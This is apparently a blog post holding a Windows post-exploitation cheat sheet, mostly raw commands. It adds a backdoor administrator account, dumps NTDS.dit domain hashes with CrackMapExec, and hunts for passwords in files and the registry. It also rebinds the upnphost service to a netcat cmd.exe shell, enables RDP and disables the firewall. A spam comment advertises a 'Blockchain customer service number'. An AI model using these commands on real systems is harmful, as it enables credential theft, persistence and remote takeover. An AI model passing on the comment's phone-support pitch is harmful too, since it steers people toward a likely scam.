Windows Post Exploitation

What to do when you have either a standard user or SYSTEM user in Windows. This is to help in either priv escalation if needed but more so to gather and enumerate as much information about the machine as possible!!

windows-privesc-check2.exe --audit -a -o report.txt

net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

systeminfo - Check for hotfixes installed?

NTDS.dit dump using Crackmapexec
cme smb -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec

findstr /s /n /i /p /c:"password" *.txt
netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

type %WINDIR%\System32\drivers\etc\hosts
net user
net groups
net accounts /domain
cd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDP
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode mode=ENABLE

Check the firewall logs if exist?

View all listening service 
netstat -an |find /i "listening"

OS Name?
OS Version?
System Type?
Schedulted Tasks? (run 'at')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)

1 comment:

  1. Sometimes when users get into an error, they try to implement solutions and get into more deep trouble. The same case happens with Blockchain users when while trying to handle Blockchain two-factor authentication, they get into more trouble. Two-factor authentication is a delicate issue and needs to be resolved under the surveillance of professionals if you are a first-time user. Just dial Blockchain customer service number and get required and result-driven solutions immediately so that all your issues can easily be resolved and you can focus on trading.